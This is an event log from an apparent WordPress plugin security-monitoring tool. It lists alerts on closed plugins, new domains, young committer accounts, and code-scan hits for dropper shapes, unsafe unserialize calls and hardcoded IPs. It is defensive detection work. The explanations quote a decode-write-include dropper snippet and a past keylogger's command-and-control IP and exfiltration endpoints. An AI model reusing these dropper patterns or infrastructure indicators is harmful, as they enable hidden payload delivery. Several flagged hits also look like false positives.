Events

800 events (filtered). · Last rule pass 9h ago. · 4 open / 4,675 resolved overall.

State: Open Resolved All
Critical plugin_closed Bigfishgames Syndicate (10 installs) Resolved 28d ago
Slugbigfishgames-syndicate
Closed reasonsecurity-issue
Closed date2026-05-14 00:00:00
Active installs10
View raw JSON
{
    "slug": "bigfishgames-syndicate",
    "closed_reason": "security-issue",
    "closed_date": "2026-05-14 00:00:00",
    "active_installs": 10
}
Critical plugin_closed addfreespace (10 installs) Resolved 28d ago
Slugaddfreespace
Closed reasonsecurity-issue
Closed date2026-04-28 00:00:00
Active installs10
View raw JSON
{
    "slug": "addfreespace",
    "closed_reason": "security-issue",
    "closed_date": "2026-04-28 00:00:00",
    "active_installs": 10
}
Critical domain_younger_than_plugin Redirection (100k+ installs) Resolved 2mo ago
Slugredirect-redirection
Domainredirection.pro
Domain sourceplugin_uri
Domain registered at2026-06-14
Plugin earliest commit2021-06-28 20:47:17
Plugin latest release2026-05-08 19:04:51
Gap days1,811
Domain age at release-36
Active installs100,000
View raw JSON
{
    "slug": "redirect-redirection",
    "domain": "redirection.pro",
    "domain_source": "plugin_uri",
    "domain_registered_at": "2026-06-14",
    "plugin_earliest_commit": "2021-06-28 20:47:17",
    "plugin_latest_release": "2026-05-08 19:04:51",
    "gap_days": 1811,
    "domain_age_at_release": -36,
    "active_installs": 100000
}
Critical domain_younger_than_plugin Supreme Modules Lite – Divi Theme, Extra Theme and Divi Builder (200k+ installs) Resolved 2mo ago
Slugsupreme-modules-for-divi
Domainsuprememodules.com
Domain sourceplugin_uri
Domain registered at2025-12-11
Plugin earliest commit2018-09-24 00:40:46
Plugin latest release2025-12-19 07:42:32
Gap days2,634
Domain age at release8
Active installs200,000
View raw JSON
{
    "slug": "supreme-modules-for-divi",
    "domain": "suprememodules.com",
    "domain_source": "plugin_uri",
    "domain_registered_at": "2025-12-11",
    "plugin_earliest_commit": "2018-09-24 00:40:46",
    "plugin_latest_release": "2025-12-19 07:42:32",
    "gap_days": 2634,
    "domain_age_at_release": 8,
    "active_installs": 200000
}
Critical code_scan_delta SpeedyGo (100 installs) Suspicious 2mo ago
Slugspeedy-go
Previous version2.1.4
Current version2.1.8
New findings
PatternKindFileLineSnippetConfidence
unserialize_after_remote_callbuiltinincludes/api-key-api.php317L309: $resbody = wp_remote_retrieve_body($response); → L317: while (is_string($opts) && @unserialize($opts, ['allowed_classes' => false]) !== false)high
New finding count1
View raw JSON
{
    "slug": "speedy-go",
    "previous_version": "2.1.4",
    "current_version": "2.1.8",
    "new_findings": [
        {
            "pattern": "unserialize_after_remote_call",
            "kind": "builtin",
            "file": "includes/api-key-api.php",
            "line": 317,
            "snippet": "L309: $resbody = wp_remote_retrieve_body($response);  \u2192  L317: while (is_string($opts) && @unserialize($opts, ['allowed_classes' => false]) !== false)",
            "confidence": "high"
        }
    ],
    "new_finding_count": 1
}
Critical code_scan_delta FV Flowplayer Video Player (10k+ installs) Resolved 2mo ago
Slugfv-wordpress-flowplayer
Previous version7.5.52.7212
Current version7.5.53.7212
New findings
PatternKindFileLineSnippetConfidence
unserialize_after_remote_callbuiltinincludes/fp-api-private.php381L371: $raw_response = wp_remote_post( $this->strPrivateAPI, $request ); → L381: $response = @unserialize( preg_replace( '~^/\*[\s\S]*?\*/\s+~', '', $raw_responshigh
New finding count1
View raw JSON
{
    "slug": "fv-wordpress-flowplayer",
    "previous_version": "7.5.52.7212",
    "current_version": "7.5.53.7212",
    "new_findings": [
        {
            "pattern": "unserialize_after_remote_call",
            "kind": "builtin",
            "file": "includes/fp-api-private.php",
            "line": 381,
            "snippet": "L371: $raw_response = wp_remote_post( $this->strPrivateAPI, $request );  \u2192  L381: $response = @unserialize( preg_replace( '~^/\\*[\\s\\S]*?\\*/\\s+~', '', $raw_respons",
            "confidence": "high"
        }
    ],
    "new_finding_count": 1
}
Critical code_pattern Groovy Menu Plugin (Free) (4k+ installs) Resolved 2mo ago
Sluggroovy-menu-free
Patterndecode_write_dropper
Kindbuiltin
Version1.4.8
Hit count1
First hit
File
includes/modules/core/inc/GroovyMenuSettings.php
Line
1,177
Snippet
$tmpFile = file_put_contents( $filename, base64_decode( $value['data'] ) );
Explanationa runtime decode primitive (`gzuncompress`/`gzinflate`/`gzdecode`/`base64_decode`) feeds a filesystem write (`fwrite`/`file_put_contents`) which is then `include`d/`require`d as a variable path — the textbook dropper shape: ship an encoded payload as data, decode it to disk at activation/admin-init, and execute it. The siteguarding burner `wp-plugin-management` (audit #43) used exactly this: `fwrite($fp, gzuncompress($c)); include($filename);` in its `register_activation_hook` to plant `siteguarding_tools.php`. Near-zero FP because legit caching writes decoded data but never `include`s a computed path it just wrote.
View raw JSON
{
    "slug": "groovy-menu-free",
    "pattern": "decode_write_dropper",
    "kind": "builtin",
    "version": "1.4.8",
    "hit_count": 1,
    "first_hit": {
        "file": "includes/modules/core/inc/GroovyMenuSettings.php",
        "line": 1177,
        "snippet": "$tmpFile    = file_put_contents( $filename, base64_decode( $value['data'] ) );"
    },
    "explanation": "a runtime decode primitive (`gzuncompress`/`gzinflate`/`gzdecode`/`base64_decode`) feeds a filesystem write (`fwrite`/`file_put_contents`) which is then `include`d/`require`d as a variable path \u2014 the textbook dropper shape: ship an encoded payload as data, decode it to disk at activation/admin-init, and execute it. The siteguarding burner `wp-plugin-management` (audit #43) used exactly this: `fwrite($fp, gzuncompress($c)); include($filename);` in its `register_activation_hook` to plant `siteguarding_tools.php`. Near-zero FP because legit caching writes decoded data but never `include`s a computed path it just wrote."
}
Critical closed_plugin_resurrection Easy Responsive Test (10 installs) Resolved 2mo ago
Slugeasy-responsive-test
Previously closed reasonsecurity-issue
Author slugoscitas
Current version3.0.0
Active installs10
ExplanationPlugin was previously closed by wp.org for a security issue and has now been reopened. Reopens of security-closed plugins are rare and typically indicate the original author fixed the issue — verify the current committer set matches the pre-closure state, and diff the current trunk against the pre-closure version to confirm no new payload was introduced.
Serial offender noteSeverity bumped high→critical: author oscitas has 5 prior security-issue closures on wp.org.
View raw JSON
{
    "slug": "easy-responsive-test",
    "previously_closed_reason": "security-issue",
    "author_slug": "oscitas",
    "current_version": "3.0.0",
    "active_installs": 10,
    "explanation": "Plugin was previously closed by wp.org for a security issue and has now been reopened. Reopens of security-closed plugins are rare and typically indicate the original author fixed the issue \u2014 verify the current committer set matches the pre-closure state, and diff the current trunk against the pre-closure version to confirm no new payload was introduced.",
    "serial_offender_note": "Severity bumped high\u2192critical: author oscitas has 5 prior security-issue closures on wp.org."
}
Critical code_pattern Content Guard Pro – Database Malware Scanner & SEO Spam Detector (50 installs) Resolved 2mo ago
Slugcontent-guard-pro
Patternobfuscated_payload_in_data_file
Kindbuiltin
Version1.4.0
Hit count1
First hit
File
includes/signatures.pack
Line
0
Snippet
(PHP payload in data file — decoded via base64+gzuncompress)
Explanationa non-PHP data file (`.dat`/`.gzs`/`.bin`/etc.) contains PHP source — either stored raw under a misleading extension or sealed behind base64/gzip — and/or matches a catalog IOC once decoded. This is the payload-hiding evasion the siteguarding burner fleet used to defeat PHP-only IOC greps: `wp-plugin-management`/`plugin.dat` (gzip+base64 → siteguarding_tools.php v1.7), `speedup-optimization`/`classes/tools.gzs` (base64 → v2.1), `bytedefense`/`core/scan_sigs_db.dat` (raw PHP disguised as a "scan signatures database", `include`d by a web-reachable `scan.php`). The scanner now decodes these blobs and matches PHP markers + content IOCs inside them.
View raw JSON
{
    "slug": "content-guard-pro",
    "pattern": "obfuscated_payload_in_data_file",
    "kind": "builtin",
    "version": "1.4.0",
    "hit_count": 1,
    "first_hit": {
        "file": "includes/signatures.pack",
        "line": 0,
        "snippet": "(PHP payload in data file \u2014 decoded via base64+gzuncompress)"
    },
    "explanation": "a non-PHP data file (`.dat`/`.gzs`/`.bin`/etc.) contains PHP source \u2014 either stored raw under a misleading extension or sealed behind base64/gzip \u2014 and/or matches a catalog IOC once decoded. This is the payload-hiding evasion the siteguarding burner fleet used to defeat PHP-only IOC greps: `wp-plugin-management`/`plugin.dat` (gzip+base64 \u2192 siteguarding_tools.php v1.7), `speedup-optimization`/`classes/tools.gzs` (base64 \u2192 v2.1), `bytedefense`/`core/scan_sigs_db.dat` (raw PHP disguised as a \"scan signatures database\", `include`d by a web-reachable `scan.php`). The scanner now decodes these blobs and matches PHP markers + content IOCs inside them."
}
Critical code_pattern Unofficial Yektanet (10 installs) Resolved 2mo ago
Slugunofficial-yektanet
Patternhardcoded_ip_url
Kindbuiltin
Version2.0.0
Hit count1
First hit
File
unofficialYektanet.php
Line
37
Snippet
define('YEKTANET_PRODUCT_UPDATE_API_URL', 'http://87.247.185.150/products');
Explanationplugin source hardcodes a raw IPv4 URL (e.g. `https://94.156.79.8/...`) — legitimate plugins use DNS hostnames because IPs change. Hardcoded IPs in plugin code are almost always either dev leftovers or attacker C2 infrastructure. The June 2024 social-warfare keylogger (audit #14) used `https://94.156.79.8/sc-top.js` for the JS payload host, `/AddSites` for victim registration, `/CMSUsers` for filesystem-recon exfil. Operator infrastructure on raw IPs avoids domain registration / RDAP detection paths. Post-filtered to skip RFC1918/loopback/link-local ranges and `vendor/`/`tests/` paths.
View raw JSON
{
    "slug": "unofficial-yektanet",
    "pattern": "hardcoded_ip_url",
    "kind": "builtin",
    "version": "2.0.0",
    "hit_count": 1,
    "first_hit": {
        "file": "unofficialYektanet.php",
        "line": 37,
        "snippet": "define('YEKTANET_PRODUCT_UPDATE_API_URL', 'http://87.247.185.150/products');"
    },
    "explanation": "plugin source hardcodes a raw IPv4 URL (e.g. `https://94.156.79.8/...`) \u2014 legitimate plugins use DNS hostnames because IPs change. Hardcoded IPs in plugin code are almost always either dev leftovers or attacker C2 infrastructure. The June 2024 social-warfare keylogger (audit #14) used `https://94.156.79.8/sc-top.js` for the JS payload host, `/AddSites` for victim registration, `/CMSUsers` for filesystem-recon exfil. Operator infrastructure on raw IPs avoids domain registration / RDAP detection paths. Post-filtered to skip RFC1918/loopback/link-local ranges and `vendor/`/`tests/` paths."
}
Critical code_pattern POP – e-invoicing for WooCommerce: SdI, PEPPOL, KSeF (ex-WooPop) (90 installs) Resolved 2mo ago
Slugwoopop-electronic-invoice-free
Patterndecode_write_dropper
Kindbuiltin
Version6.9.5
Hit count1
First hit
File
addon/to/aruba/src/Functions/Api.php
Line
797
Snippet
$pdfFile = base64_decode($responseData->pdfFile);
Explanationa runtime decode primitive (`gzuncompress`/`gzinflate`/`gzdecode`/`base64_decode`) feeds a filesystem write (`fwrite`/`file_put_contents`) which is then `include`d/`require`d as a variable path — the textbook dropper shape: ship an encoded payload as data, decode it to disk at activation/admin-init, and execute it. The siteguarding burner `wp-plugin-management` (audit #43) used exactly this: `fwrite($fp, gzuncompress($c)); include($filename);` in its `register_activation_hook` to plant `siteguarding_tools.php`. Near-zero FP because legit caching writes decoded data but never `include`s a computed path it just wrote.
View raw JSON
{
    "slug": "woopop-electronic-invoice-free",
    "pattern": "decode_write_dropper",
    "kind": "builtin",
    "version": "6.9.5",
    "hit_count": 1,
    "first_hit": {
        "file": "addon/to/aruba/src/Functions/Api.php",
        "line": 797,
        "snippet": "$pdfFile = base64_decode($responseData->pdfFile);"
    },
    "explanation": "a runtime decode primitive (`gzuncompress`/`gzinflate`/`gzdecode`/`base64_decode`) feeds a filesystem write (`fwrite`/`file_put_contents`) which is then `include`d/`require`d as a variable path \u2014 the textbook dropper shape: ship an encoded payload as data, decode it to disk at activation/admin-init, and execute it. The siteguarding burner `wp-plugin-management` (audit #43) used exactly this: `fwrite($fp, gzuncompress($c)); include($filename);` in its `register_activation_hook` to plant `siteguarding_tools.php`. Near-zero FP because legit caching writes decoded data but never `include`s a computed path it just wrote."
}
Critical code_pattern BitFire Security – Firewall, Malware Scanner, Bot Blocker, Login Protection (300 installs) Resolved 2mo ago
Slugbitfire
Patternhardcoded_ip_url
Kindbuiltin
Version5.0.9
Hit count3
First hit
File
src/util.php
Line
3,429
Snippet
$url = 'https://1.1.1.1/dns-query?name=' . urlencode($query) . '&type=PTR';
Explanationplugin source hardcodes a raw IPv4 URL (e.g. `https://94.156.79.8/...`) — legitimate plugins use DNS hostnames because IPs change. Hardcoded IPs in plugin code are almost always either dev leftovers or attacker C2 infrastructure. The June 2024 social-warfare keylogger (audit #14) used `https://94.156.79.8/sc-top.js` for the JS payload host, `/AddSites` for victim registration, `/CMSUsers` for filesystem-recon exfil. Operator infrastructure on raw IPs avoids domain registration / RDAP detection paths. Post-filtered to skip RFC1918/loopback/link-local ranges and `vendor/`/`tests/` paths.
View raw JSON
{
    "slug": "bitfire",
    "pattern": "hardcoded_ip_url",
    "kind": "builtin",
    "version": "5.0.9",
    "hit_count": 3,
    "first_hit": {
        "file": "src/util.php",
        "line": 3429,
        "snippet": "$url      = 'https://1.1.1.1/dns-query?name=' . urlencode($query) . '&type=PTR';"
    },
    "explanation": "plugin source hardcodes a raw IPv4 URL (e.g. `https://94.156.79.8/...`) \u2014 legitimate plugins use DNS hostnames because IPs change. Hardcoded IPs in plugin code are almost always either dev leftovers or attacker C2 infrastructure. The June 2024 social-warfare keylogger (audit #14) used `https://94.156.79.8/sc-top.js` for the JS payload host, `/AddSites` for victim registration, `/CMSUsers` for filesystem-recon exfil. Operator infrastructure on raw IPs avoids domain registration / RDAP detection paths. Post-filtered to skip RFC1918/loopback/link-local ranges and `vendor/`/`tests/` paths."
}
Critical code_pattern Trakoo – Orders Tracking for WooCommerce (10k+ installs) Resolved 2mo ago
Slugwoo-orders-tracking
Patternhardcoded_ip_url
Kindbuiltin
Version1.3.0
Hit count1
First hit
File
includes/class-vi-woo-orders-tracking-trackingmore.php
Line
331
Snippet
return vi_wot_json_decode( '[{"courier_name":"DHL Express","courier_code":"dhl","courier_type":"express","courier_phone":null,"country_code":"DE","courier_url":"http://www.dhl.com/en/express/tracki
Explanationplugin source hardcodes a raw IPv4 URL (e.g. `https://94.156.79.8/...`) — legitimate plugins use DNS hostnames because IPs change. Hardcoded IPs in plugin code are almost always either dev leftovers or attacker C2 infrastructure. The June 2024 social-warfare keylogger (audit #14) used `https://94.156.79.8/sc-top.js` for the JS payload host, `/AddSites` for victim registration, `/CMSUsers` for filesystem-recon exfil. Operator infrastructure on raw IPs avoids domain registration / RDAP detection paths. Post-filtered to skip RFC1918/loopback/link-local ranges and `vendor/`/`tests/` paths.
View raw JSON
{
    "slug": "woo-orders-tracking",
    "pattern": "hardcoded_ip_url",
    "kind": "builtin",
    "version": "1.3.0",
    "hit_count": 1,
    "first_hit": {
        "file": "includes/class-vi-woo-orders-tracking-trackingmore.php",
        "line": 331,
        "snippet": "return vi_wot_json_decode( '[{\"courier_name\":\"DHL Express\",\"courier_code\":\"dhl\",\"courier_type\":\"express\",\"courier_phone\":null,\"country_code\":\"DE\",\"courier_url\":\"http://www.dhl.com/en/express/tracki"
    },
    "explanation": "plugin source hardcodes a raw IPv4 URL (e.g. `https://94.156.79.8/...`) \u2014 legitimate plugins use DNS hostnames because IPs change. Hardcoded IPs in plugin code are almost always either dev leftovers or attacker C2 infrastructure. The June 2024 social-warfare keylogger (audit #14) used `https://94.156.79.8/sc-top.js` for the JS payload host, `/AddSites` for victim registration, `/CMSUsers` for filesystem-recon exfil. Operator infrastructure on raw IPs avoids domain registration / RDAP detection paths. Post-filtered to skip RFC1918/loopback/link-local ranges and `vendor/`/`tests/` paths."
}
Critical code_scan_delta KnowledgeBase with AI ChatBot HelpDesk – KBx (30 installs) Resolved 2mo ago
Slugknowledgebase-helpdesk
Previous version3.7.3
Current version3.7.4
New findings
PatternKindFileLineSnippetConfidence
unserialize_after_remote_callbuiltinkbx-wpbot/chatbot/includes/openai/plugin-upgrader/classes/plugin-upgrader.php190L185: $request = wp_remote_post($this->update_path, $params ); → L190: return @unserialize( $request['body'] );high
unserialize_after_remote_callbuiltinkbx-wpbot/chatbot/includes/integration/openai/plugin-upgrader/classes/plugin-upgrader.php190L185: $request = wp_remote_post($this->update_path, $params ); → L190: return @unserialize( $request['body'] );high
New finding count2
View raw JSON
{
    "slug": "knowledgebase-helpdesk",
    "previous_version": "3.7.3",
    "current_version": "3.7.4",
    "new_findings": [
        {
            "pattern": "unserialize_after_remote_call",
            "kind": "builtin",
            "file": "kbx-wpbot/chatbot/includes/openai/plugin-upgrader/classes/plugin-upgrader.php",
            "line": 190,
            "snippet": "L185: $request = wp_remote_post($this->update_path, $params );  \u2192  L190: return @unserialize( $request['body'] );",
            "confidence": "high"
        },
        {
            "pattern": "unserialize_after_remote_call",
            "kind": "builtin",
            "file": "kbx-wpbot/chatbot/includes/integration/openai/plugin-upgrader/classes/plugin-upgrader.php",
            "line": 190,
            "snippet": "L185: $request = wp_remote_post($this->update_path, $params );  \u2192  L190: return @unserialize( $request['body'] );",
            "confidence": "high"
        }
    ],
    "new_finding_count": 2
}
Critical code_scan_delta SpeedyGo (100 installs) Suspicious 2mo ago
Slugspeedy-go
Previous version2.1.1
Current version2.1.3
New findings
PatternKindFileLineSnippetConfidence
unserialize_after_remote_callbuiltinincludes/api-key-api.php304L296: $resbody = wp_remote_retrieve_body($response); → L304: while (is_string($opts) && @unserialize($opts, ['allowed_classes' => false]) !== false)high
New finding count1
View raw JSON
{
    "slug": "speedy-go",
    "previous_version": "2.1.1",
    "current_version": "2.1.3",
    "new_findings": [
        {
            "pattern": "unserialize_after_remote_call",
            "kind": "builtin",
            "file": "includes/api-key-api.php",
            "line": 304,
            "snippet": "L296: $resbody = wp_remote_retrieve_body($response);  \u2192  L304: while (is_string($opts) && @unserialize($opts, ['allowed_classes' => false]) !== false)",
            "confidence": "high"
        }
    ],
    "new_finding_count": 1
}
Critical code_scan_delta POP – e-invoicing for WooCommerce: SdI, PEPPOL, KSeF (ex-WooPop) (90 installs) Resolved 2mo ago
Slugwoopop-electronic-invoice-free
Previous version6.9.2
Current version6.9.5
New findings
PatternKindFileLineSnippetConfidence
decode_write_dropperbuiltinaddon/to/aruba/src/Functions/Api.php797$pdfFile = base64_decode($responseData->pdfFile);high
base64_decodebuiltinsrc/Functions/CloudApi.php1,209$decoded = base64_decode($base64, true);medium
New finding count2
View raw JSON
{
    "slug": "woopop-electronic-invoice-free",
    "previous_version": "6.9.2",
    "current_version": "6.9.5",
    "new_findings": [
        {
            "pattern": "decode_write_dropper",
            "kind": "builtin",
            "file": "addon/to/aruba/src/Functions/Api.php",
            "line": 797,
            "snippet": "$pdfFile = base64_decode($responseData->pdfFile);",
            "confidence": "high"
        },
        {
            "pattern": "base64_decode",
            "kind": "builtin",
            "file": "src/Functions/CloudApi.php",
            "line": 1209,
            "snippet": "$decoded = base64_decode($base64, true);",
            "confidence": "medium"
        }
    ],
    "new_finding_count": 2
}
Critical code_scan_delta BitFire Security – Firewall, Malware Scanner, Bot Blocker, Login Protection (300 installs) Resolved 2mo ago
Slugbitfire
Previous version4.8.2
Current version5.0.9
New findings
PatternKindFileLineSnippetConfidence
eval_callbuiltinsrc/dashboard/threat_hunter.php1,795$reasons[] = 'eval()';medium
eval_callbuiltinsrc/dashboard/threat_hunter.php3,213['/\beval\s*\(/i', 'eval()', 'danger'],medium
eval_callbuiltinsrc/dashboard/threat_hunter.php3,229'eval(',medium
eval_callbuiltinsrc/dashboard/threat_hunter.php3,450$excerpt_clause = content_like_clause('post_excerpt', ['<script', 'javascript:', 'eval(']);medium
eval_callbuiltinsrc/dashboard/threat_hunter.php3,809$tn_clause = content_like_clause('t.name', ['<script', 'javascript:', 'eval(']);medium
base64_decodebuiltinsrc/dashboard/threat_hunter.php1,799$reasons[] = 'base64_decode()';medium
gzinflatebuiltinsrc/dashboard/threat_hunter.php1,803$reasons[] = 'gzinflate()';medium
hardcoded_ip_urlbuiltinsrc/util.php3,429$url = 'https://1.1.1.1/dns-query?name=' . urlencode($query) . '&type=PTR';high
hardcoded_ip_urlbuiltinsrc/util.php3,475$url = 'https://1.1.1.1/dns-query?name=' . urlencode($hostname) . '&type=A';high
hardcoded_ip_urlbuiltinsrc/util.php3,523$url = 'https://1.1.1.1/dns-query?name=' . urlencode($hostname) . '&type=AAAA';high
base64_decodebuiltinsrc/wpcli.php271$encoded = base64_decode($data['data'] ?? '');medium
base64_decodebuiltinsrc/wpcli.php285$encoded = base64_decode($data['data'] ?? '');medium
eval_callbuiltinsrc/cms2.php1,807T_EVAL => 'eval()',medium
New finding count13
View raw JSON
{
    "slug": "bitfire",
    "previous_version": "4.8.2",
    "current_version": "5.0.9",
    "new_findings": [
        {
            "pattern": "eval_call",
            "kind": "builtin",
            "file": "src/dashboard/threat_hunter.php",
            "line": 1795,
            "snippet": "$reasons[] = 'eval()';",
            "confidence": "medium"
        },
        {
            "pattern": "eval_call",
            "kind": "builtin",
            "file": "src/dashboard/threat_hunter.php",
            "line": 3213,
            "snippet": "['/\\beval\\s*\\(/i',                              'eval()',               'danger'],",
            "confidence": "medium"
        },
        {
            "pattern": "eval_call",
            "kind": "builtin",
            "file": "src/dashboard/threat_hunter.php",
            "line": 3229,
            "snippet": "'eval(',",
            "confidence": "medium"
        },
        {
            "pattern": "eval_call",
            "kind": "builtin",
            "file": "src/dashboard/threat_hunter.php",
            "line": 3450,
            "snippet": "$excerpt_clause = content_like_clause('post_excerpt', ['<script', 'javascript:', 'eval(']);",
            "confidence": "medium"
        },
        {
            "pattern": "eval_call",
            "kind": "builtin",
            "file": "src/dashboard/threat_hunter.php",
            "line": 3809,
            "snippet": "$tn_clause = content_like_clause('t.name', ['<script', 'javascript:', 'eval(']);",
            "confidence": "medium"
        },
        {
            "pattern": "base64_decode",
            "kind": "builtin",
            "file": "src/dashboard/threat_hunter.php",
            "line": 1799,
            "snippet": "$reasons[] = 'base64_decode()';",
            "confidence": "medium"
        },
        {
            "pattern": "gzinflate",
            "kind": "builtin",
            "file": "src/dashboard/threat_hunter.php",
            "line": 1803,
            "snippet": "$reasons[] = 'gzinflate()';",
            "confidence": "medium"
        },
        {
            "pattern": "hardcoded_ip_url",
            "kind": "builtin",
            "file": "src/util.php",
            "line": 3429,
            "snippet": "$url      = 'https://1.1.1.1/dns-query?name=' . urlencode($query) . '&type=PTR';",
            "confidence": "high"
        },
        {
            "pattern": "hardcoded_ip_url",
            "kind": "builtin",
            "file": "src/util.php",
            "line": 3475,
            "snippet": "$url      = 'https://1.1.1.1/dns-query?name=' . urlencode($hostname) . '&type=A';",
            "confidence": "high"
        },
        {
            "pattern": "hardcoded_ip_url",
            "kind": "builtin",
            "file": "src/util.php",
            "line": 3523,
            "snippet": "$url      = 'https://1.1.1.1/dns-query?name=' . urlencode($hostname) . '&type=AAAA';",
            "confidence": "high"
        },
        {
            "pattern": "base64_decode",
            "kind": "builtin",
            "file": "src/wpcli.php",
            "line": 271,
            "snippet": "$encoded = base64_decode($data['data'] ?? '');",
            "confidence": "medium"
        },
        {
            "pattern": "base64_decode",
            "kind": "builtin",
            "file": "src/wpcli.php",
            "line": 285,
            "snippet": "$encoded = base64_decode($data['data'] ?? '');",
            "confidence": "medium"
        },
        {
            "pattern": "eval_call",
            "kind": "builtin",
            "file": "src/cms2.php",
            "line": 1807,
            "snippet": "T_EVAL           => 'eval()',",
            "confidence": "medium"
        }
    ],
    "new_finding_count": 13
}
Critical code_scan_delta Nexter Extension – Security, Performance, Code Snippets & Site Toolkit (10k+ installs) Resolved 2mo ago
Slugnexter-extension
Previous version4.6.11
Current version4.6.15
New findings
PatternKindFileLineSnippetConfidence
unserialize_after_remote_callbuiltininclude/panel-settings/class-nxt-panel-ajax-router.php806L796: $response = wp_remote_post($theme_api_url, $args); → L806: $theme_info = @unserialize( $body );high
unserialize_after_remote_callbuiltininclude/panel-settings/class-nxt-panel-ajax-router.php898L897: $body = wp_remote_retrieve_body( $response ); → L898: $plugin_info = @unserialize( $body );high
New finding count2
View raw JSON
{
    "slug": "nexter-extension",
    "previous_version": "4.6.11",
    "current_version": "4.6.15",
    "new_findings": [
        {
            "pattern": "unserialize_after_remote_call",
            "kind": "builtin",
            "file": "include/panel-settings/class-nxt-panel-ajax-router.php",
            "line": 806,
            "snippet": "L796: $response = wp_remote_post($theme_api_url, $args);  \u2192  L806: $theme_info = @unserialize( $body );",
            "confidence": "high"
        },
        {
            "pattern": "unserialize_after_remote_call",
            "kind": "builtin",
            "file": "include/panel-settings/class-nxt-panel-ajax-router.php",
            "line": 898,
            "snippet": "L897: $body = wp_remote_retrieve_body( $response );  \u2192  L898: $plugin_info = @unserialize( $body );",
            "confidence": "high"
        }
    ],
    "new_finding_count": 2
}
Critical code_scan_delta Trakoo – Orders Tracking for WooCommerce (10k+ installs) Resolved 2mo ago
Slugwoo-orders-tracking
Previous version1.2.17
Current version1.3.0
New findings
PatternKindFileLineSnippetConfidence
hardcoded_ip_urlbuiltinincludes/class-vi-woo-orders-tracking-trackingmore.php331return vi_wot_json_decode( '[{"courier_name":"DHL Express","courier_code":"dhl","courier_type":"express","courier_phone":null,"country_code":"DE","courier_url":"http://www.dhl.com/en/express/trackihigh
New finding count1
View raw JSON
{
    "slug": "woo-orders-tracking",
    "previous_version": "1.2.17",
    "current_version": "1.3.0",
    "new_findings": [
        {
            "pattern": "hardcoded_ip_url",
            "kind": "builtin",
            "file": "includes/class-vi-woo-orders-tracking-trackingmore.php",
            "line": 331,
            "snippet": "return vi_wot_json_decode( '[{\"courier_name\":\"DHL Express\",\"courier_code\":\"dhl\",\"courier_type\":\"express\",\"courier_phone\":null,\"country_code\":\"DE\",\"courier_url\":\"http://www.dhl.com/en/express/tracki",
            "confidence": "high"
        }
    ],
    "new_finding_count": 1
}
Critical new_committer_young_account Sailthru for WordPress (2k+ installs) Resolved 3mo ago
Slugsailthru-widget
Committerdchebrolu
Display namedchebrolu
Member since2026-03-09
First commit at2026-05-20 15:35:21
Account age at first commit72
Commit count2
Active installs2,000
View raw JSON
{
    "slug": "sailthru-widget",
    "committer": "dchebrolu",
    "display_name": "dchebrolu",
    "member_since": "2026-03-09",
    "first_commit_at": "2026-05-20 15:35:21",
    "account_age_at_first_commit": 72,
    "commit_count": 2,
    "active_installs": 2000
}
Critical new_committer_young_account CDEKDelivery (3k+ installs) Resolved 3mo ago
Slugcdekdelivery
Committerevgeeniya
Display nameevgeeniya
Member since2026-06-22
First commit at2026-06-23 07:47:26
Account age at first commit1
Commit count3
Active installs2,000
View raw JSON
{
    "slug": "cdekdelivery",
    "committer": "evgeeniya",
    "display_name": "evgeeniya",
    "member_since": "2026-06-22",
    "first_commit_at": "2026-06-23 07:47:26",
    "account_age_at_first_commit": 1,
    "commit_count": 3,
    "active_installs": 2000
}
Critical new_committer_young_account List all URLs (5k+ installs) Resolved 3mo ago
Sluglist-all-urls
Committerfatihkadirakin
Display nameFatih Kadir Akın
Member since2026-03-04
First commit at2026-05-21 13:35:36
Account age at first commit78
Commit count1
Active installs5,000
View raw JSON
{
    "slug": "list-all-urls",
    "committer": "fatihkadirakin",
    "display_name": "Fatih Kadir Ak\u0131n",
    "member_since": "2026-03-04",
    "first_commit_at": "2026-05-21 13:35:36",
    "account_age_at_first_commit": 78,
    "commit_count": 1,
    "active_installs": 5000
}
Critical new_committer_young_account Exclusive Addons for Elementor (50k+ installs) Resolved 3mo ago
Slugexclusive-addons-for-elementor
Committerjenndevdivilife
Display namejenndevdivilife
Member since2026-05-13
First commit at2026-06-24 01:11:06
Account age at first commit42
Commit count2
Active installs50,000
View raw JSON
{
    "slug": "exclusive-addons-for-elementor",
    "committer": "jenndevdivilife",
    "display_name": "jenndevdivilife",
    "member_since": "2026-05-13",
    "first_commit_at": "2026-06-24 01:11:06",
    "account_age_at_first_commit": 42,
    "commit_count": 2,
    "active_installs": 50000
}
Critical new_committer_young_account Nomba Payment Gateway for WooCommerce (100 installs) Resolved 3mo ago
Slugwc-nomba-gateway
Committertoluwasecollins
Display nametoluwasecollins
Member since2026-04-10
First commit at2026-04-17 11:52:53
Account age at first commit7
Commit count3
Active installs100
View raw JSON
{
    "slug": "wc-nomba-gateway",
    "committer": "toluwasecollins",
    "display_name": "toluwasecollins",
    "member_since": "2026-04-10",
    "first_commit_at": "2026-04-17 11:52:53",
    "account_age_at_first_commit": 7,
    "commit_count": 3,
    "active_installs": 100
}
Critical new_committer_young_account ravpage (300 installs) Resolved 3mo ago
Slugravpage
Committerhencoen1
Display nameChen Cohen – OCW
Member since2026-06-08
First commit at2026-06-12 11:54:00
Account age at first commit4
Commit count6
Active installs300
View raw JSON
{
    "slug": "ravpage",
    "committer": "hencoen1",
    "display_name": "Chen Cohen \u2013 OCW",
    "member_since": "2026-06-08",
    "first_commit_at": "2026-06-12 11:54:00",
    "account_age_at_first_commit": 4,
    "commit_count": 6,
    "active_installs": 300
}
Critical new_committer_young_account WordLift – AI powered SEO – Schema (400 installs) Resolved 3mo ago
Slugwordlift
Committernumankaraaslan
Display namenumankaraaslan
Member since2026-06-26
First commit at2026-06-27 22:39:35
Account age at first commit1
Commit count6
Active installs400
View raw JSON
{
    "slug": "wordlift",
    "committer": "numankaraaslan",
    "display_name": "numankaraaslan",
    "member_since": "2026-06-26",
    "first_commit_at": "2026-06-27 22:39:35",
    "account_age_at_first_commit": 1,
    "commit_count": 6,
    "active_installs": 400
}
Critical closed_plugin_resurrection NS Watermark For WooCommerce (20 installs) Resolved 3mo ago
Slugns-woocommerce-watermark
Previously closed reasonsecurity-issue
Author slugnsthemes
Current version4.0.0
Active installs30
ExplanationPlugin was previously closed by wp.org for a security issue and has now been reopened. Reopens of security-closed plugins are rare and typically indicate the original author fixed the issue — verify the current committer set matches the pre-closure state, and diff the current trunk against the pre-closure version to confirm no new payload was introduced.
Serial offender noteSeverity bumped high→critical: author nsthemes has 5 prior security-issue closures on wp.org.
View raw JSON
{
    "slug": "ns-woocommerce-watermark",
    "previously_closed_reason": "security-issue",
    "author_slug": "nsthemes",
